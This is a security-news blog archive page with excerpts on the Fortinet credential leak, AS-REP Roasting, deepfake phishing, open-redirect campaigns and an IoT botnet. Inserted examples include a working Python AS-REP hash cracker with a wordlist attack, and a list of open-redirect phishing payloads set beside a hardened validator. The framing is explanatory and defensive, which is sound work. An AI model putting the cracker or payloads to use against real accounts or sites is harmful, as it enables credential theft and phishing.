Blog

Archive for the ‘cybercrime/malcode’ category: Page 112

Sep 9, 2021

Hackers leak passwords for 500,000 Fortinet VPN accounts

Posted by in category: cybercrime/malcode

A threat actor has leaked a list of almost 500,000 Fortinet VPN login names and passwords that were allegedly scraped from exploitable devices last summer.

While the threat actor states that the exploited Fortinet vulnerability has since been patched, they claim that many VPN credentials are still valid.

This leak is a serious incident: valid VPN credentials let an attacker enter the network as a legitimate user and from there exfiltrate data, install malware, or stage a ransomware attack. Patching the device does not invalidate credentials that were harvested before the fix, so every account on the list needs a password reset regardless of patch status.

Sep 2, 2021

What is AS-REP Roasting attack, really?

Posted by in category: cybercrime/malcode

AS-REP Roasting is a technique for obtaining crackable password material for Active Directory user accounts that have the "Do not require Kerberos preauthentication" flag set. For such an account the KDC answers an AS-REQ without first demanding proof of the password, and part of its reply (the AS-REP) is encrypted under a key derived from the user's password. Tools such as Rubeus (for harvesting) and Hashcat (for cracking) automate both halves of the attack.

Using a tool like Rubeus, attackers can enumerate the accounts that do not require preauthentication, request an AS-REP for each, and extract its encrypted part (the reply that carries the ticket-granting ticket, or TGT) for offline password cracking.

That data is written out in a format an offline cracker such as Hashcat understands, and the password is then guessed against it, usually from a wordlist (a dictionary attack), optionally expanded by mangling rules, rather than by pure brute force. Because the guessing happens offline it produces no failed-logon events on the domain controller; the traces left in the domain are the LDAP enumeration and the ticket requests themselves.
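As an added example (not code from the original post, and not Rubeus or Hashcat code), this is the offline stage written out in Python: what a cracker computes for each candidate password against a `$krb5asrep$23$user@REALM:checksum$edata2` line in Hashcat's format. It assumes etype 23 (RC4-HMAC, RFC 4757); the account name, realm, password and the AS-REP itself are constructed inside the script with a known password, not captured from a real domain.

```python
"""Offline stage of AS-REP roasting for Kerberos etype 23 (RC4-HMAC).

Added example, not code from the original post or from Rubeus/Hashcat.
It re-implements what `hashcat -m 18200` checks for each candidate
password. RC4, MD4 and the RC4-HMAC key schedule (RFC 4757) are written
out so the script runs offline (OpenSSL 3 builds often disable MD4 in
hashlib). The sample AS-REP is constructed by forge_asrep(), not captured.
"""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
# RFC 4757: RC4-HMAC uses key usage 8 for the AS-REP encrypted part
# (RFC 4120 usage 3 is remapped), which is why crackers derive K1 from 8.
AS_REP_USAGE = 8


def _rot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320); the NT hash is MD4 over the UTF-16LE password."""
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:
                f, k, s, t = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, t = (b & c) | (b & d) | (c & d), (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, t = b ^ c ^ d, r3_order[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, _rot((a + f + x[k] + t) & MASK, s), b, c
        h = [(u + v) & MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def ntlm(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is simply the account's NT hash."""
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                     # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                        # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def forge_asrep(user: str, realm: str, password: str, enc_part: bytes, confounder: bytes = None) -> str:
    """Constructed test data: the hashcat line a KDC reply for `password` would yield."""
    k1 = _hmac_md5(ntlm(password), struct.pack("<I", AS_REP_USAGE))
    plain = (confounder if confounder is not None else os.urandom(8)) + enc_part  # 8-byte confounder first
    checksum = _hmac_md5(k1, plain)
    k3 = _hmac_md5(k1, checksum)             # per-message RC4 key
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${rc4(k3, plain).hex()}"


def check_password(line: str, password: str) -> bool:
    """True if `password` decrypts the AS-REP enc-part with a valid checksum."""
    parts = line.split("$")
    if parts[1:3] != ["krb5asrep", "23"]:
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled here")
    checksum = bytes.fromhex(parts[3].split(":")[1])
    edata2 = bytes.fromhex(parts[4])
    k1 = _hmac_md5(ntlm(password), struct.pack("<I", AS_REP_USAGE))
    k3 = _hmac_md5(k1, checksum)
    plain = rc4(k3, edata2)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)


def crack(line: str, wordlist):
    """Dictionary attack: first candidate whose NT hash verifies the line, else None."""
    for candidate in wordlist:
        if check_password(line, candidate):
            return candidate
    return None


# Constructed sample: placeholder bytes standing in for the DER EncASRepPart
# (tag 0x79), a fixed confounder, and a weak service-account password.
SAMPLE_ASREP = forge_asrep("svc_backup", "CORP.LOCAL", "Autumn2021!",
                           b"\x79\x30" + bytes(range(40)), confounder=b"\x01" * 8)
WORDLIST = ["password", "Summer2021!", "Autumn2021!", "Winter2021!"]

if __name__ == "__main__":
    print(SAMPLE_ASREP)
    print("cracked:", crack(SAMPLE_ASREP, WORDLIST))
```

The RC4-HMAC key is just the NT hash, so each guess costs one MD4, three HMAC-MD5 computations and one short RC4 pass, which is why a wordlist gets through such material quickly. The AES etypes (17 and 18) derive their key with PBKDF2 at 4096 iterations per guess, one more reason to disable RC4 and to find and fix accounts that have preauthentication turned off rather than rely on password length alone.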

Aug 31, 2021

Ten Agencies Plan to Increase Use of Facial Recognition Technology

Posted by in categories: cybercrime/malcode, government, mobile phones, robotics/AI

As the use of facial recognition technology (FRT) continues to expand, Congress, academics, and advocacy organizations have all highlighted the importance of developing a comprehensive understanding of how it is used by federal agencies.

The Government Accountability Office (GAO) surveyed 24 federal agencies about their use of FRT; the performance audit ran from April 2020 through August 2021. Sixteen of the 24 agencies reported using FRT for digital access or cybersecurity, such as allowing employees to unlock agency smartphones with it; six reported using it to generate leads in criminal investigations; five reported using it for physical security, such as controlling access to a building or facility; and 10 agencies said they planned to expand its use through fiscal year 2023.

In addition, both the Department of Homeland Security (DHS) and the Department of State reported using FRT to identify or verify travelers within or seeking admission to the United States, to identify or verify non-U.S. citizens already in the United States, and to research agency information about non-U.S. citizens seeking admission to the United States. For example, DHS's U.S. Customs and Border Protection used its Traveler Verification Service at ports of entry to help verify travelers' identities. The service uses FRT to compare a photo taken of the traveler at a port of entry with existing photos in DHS holdings, which include photographs from U.S. passports, U.S. visas, and other travel documents, as well as photographs from previous DHS encounters.

Aug 30, 2021

Deepfakes in cyberattacks aren’t coming. They’re already here

Posted by in categories: business, cybercrime/malcode

Recorded Future, a threat-intelligence firm, noted that threat actors have turned to the dark web to offer customized services and tutorials that incorporate visual and audio deepfake technologies designed to defeat security measures. Just as ransomware evolved into ransomware-as-a-service (RaaS) models, deepfakes are following the same path. This intel from Recorded Future shows attackers going one step further than the deepfake-fueled influence operations that the FBI warned about earlier this year: the new goal is to use synthetic audio and video to evade security controls themselves. Threat actors are also using the dark web, as well as clearnet sources such as forums and messengers, to share tools and best practices for deepfake techniques and technologies for the purpose of compromising organizations.

Deepfake phishing

I’ve spoken with CISOs whose security teams have observed deepfakes being used in phishing attempts or to compromise business email and communication platforms like Slack and Microsoft Teams. Cybercriminals are taking advantage of the move to a distributed workforce to manipulate employees with a well-timed voicemail that mimics the same speaking cadence as their boss, or a Slack message delivering the same information. Phishing campaigns via email or business communication platforms are the perfect delivery mechanism for deepfakes, because organizations and users implicitly trust them and they operate throughout a given environment.

Aug 29, 2021

World’s Second-Leading Crypto Network Ethereum Splits Into Two Chains

Posted by in categories: bitcoin, cryptocurrencies, cybercrime/malcode

The Ethereum blockchain saw a chain split today after a software bug affected a large number of full-node clients.

Aug 28, 2021

5 emerging cybersecurity threats facing the U.S.

Posted by in categories: business, cybercrime/malcode

Karim Hijazi is CEO of Prevailion, a cyber intelligence company that monitors and detects active threats by infiltrating hacker networks. Hijazi is also a former director of intelligence for Mandiant and a former contractor for the US intelligence community.

Ransomware has taken the spotlight lately following a string of brazen attacks on major U.S. companies.

And as bad as this kind of malware is, businesses and investors can expect to face a growing number of sophisticated cyber threats that could be even more disruptive and difficult to prevent.

Aug 28, 2021

Microsoft Warns of Widespread Phishing Attacks Using Open Redirects

Posted by in category: cybercrime/malcode

Microsoft is warning of a widespread credential phishing campaign that leverages open redirector links.
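To show the defect the campaign exploits, here is an added example, not code from the original post or from Microsoft: a login redirect written the open way, beside a validation check that closes it. The host names, the `next` parameter and the sample links are constructed for illustration.

```python
"""Open redirector: the defect the campaign rides on, beside a hardened check.

Added example, not code from the original post or from Microsoft. The
trusted host names, the parameter name `next` and the sample links are
constructed. A login page that sends the browser to whatever `next` says
is an open redirector: a phishing mail can link to
https://trusted.example/login?next=https://evil.example/ and the visible,
trusted domain vouches for the attacker's page.
"""
from urllib.parse import urlsplit

TRUSTED_HOSTS = frozenset({"trusted.example", "www.trusted.example"})  # assumption: this site's hosts


def redirect_location_vulnerable(next_param: str) -> str:
    """The open redirect: whatever the attacker put in the link is honoured."""
    return next_param or "/"


def is_safe_redirect(target: str, trusted_hosts=TRUSTED_HOSTS) -> bool:
    """Accept only a site-absolute path or an http(s) URL on a trusted host.

    Normalisation mirrors what browsers do before resolving a URL, so the
    check cannot be talked past with a form the parser and the browser read
    differently (backslashes, embedded tabs/newlines, userinfo tricks).
    """
    t = "".join(ch for ch in target.strip() if ch not in "\t\r\n").replace("\\", "/")
    if not t or any(ord(ch) < 0x20 for ch in t):
        return False
    parts = urlsplit(t)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False                                   # javascript:, data:, mailto: ...
    if parts.scheme and not parts.netloc:
        return False                                   # "https:evil.example" is reinterpreted by browsers
    if parts.netloc:
        # .hostname drops userinfo and port, so "trusted.example@evil.example"
        # is judged on evil.example; exact match, never endswith().
        return parts.hostname is not None and parts.hostname in trusted_hosts
    return t.startswith("/") and not t.startswith("//")  # exactly one leading slash: same-origin path


def redirect_location_hardened(next_param: str) -> str:
    return next_param if is_safe_redirect(next_param) else "/"


# Constructed values an attacker might place in the `next` parameter.
PHISHING_LINKS = [
    "https://evil.example/office365-login",
    "//evil.example/office365-login",
    "/\\evil.example/office365-login",
    "https://trusted.example@evil.example/",
    "https://trusted.example.evil.example/",
    "javascript:alert(document.cookie)",
    "https:evil.example",
]

if __name__ == "__main__":
    for link in PHISHING_LINKS + ["/dashboard", "https://www.trusted.example/inbox"]:
        print(f"{link!r:45} vulnerable -> {redirect_location_vulnerable(link)!r:45} hardened -> {redirect_location_hardened(link)!r}")
```

Two points to keep from the check: compare the host exactly against an allow-list (an `endswith("trusted.example")` test is defeated by `trusted.example.evil.example`), and decide on the browser's reading of the URL, not the server parser's, which is why backslashes and scheme-only forms are normalised before the decision.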

Aug 26, 2021

US Air Force prioritizes blockchain security with new Constellation Network contract

Posted by in categories: bitcoin, cybercrime/malcode, encryption, military

A blockchain-based initiative from the United States Air Force will employ Constellation’s Hypergraph Network to provide data security with the Department of Defense’s commercial partners.

In a Thursday announcement, Constellation said it had been working with Kinnami Software Corporation to develop an end-to-end data security solution using blockchain encryption and distributed data management for the United States Transportation Command, Air Mobility Command's 618th Air Operations Center, and a Civil Reserve Air Fleet partner. According to Constellation, the goal is to securely exchange data with commercial partners on missions involving the operation of aircraft and ships under contract to the Department of Defense, or DoD.

The United States Transportation Command, or USTRANSCOM, allows authorities, including those in the 618th, to coordinate missions using available resources from both the military and the private sector. Constellation's solution may improve both the security and the overall effectiveness of that coordination.

Aug 25, 2021

New SideWalk Backdoor Targets U.S.-based Computer Retail Business

Posted by in categories: business, cybercrime/malcode

A computer retailer in the United States was recently attacked with a new backdoor malware called “SideWalk.”

Aug 25, 2021

Hundreds of thousands of Realtek-based devices under attack from IoT botnet

Posted by in category: cybercrime/malcode

A dangerous vulnerability in Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors is currently under attack from a notorious DDoS botnet gang.

The attacks started last week, according to a report from IoT security firm SAM, and began just three days after fellow security firm IoT Inspector published details about the vulnerability on its blog.

Tracked as CVE-2021-35395, the vulnerability is one of four issues that IoT Inspector researchers found in the software development kit (SDK) that ships with multiple Realtek chipsets (SoCs).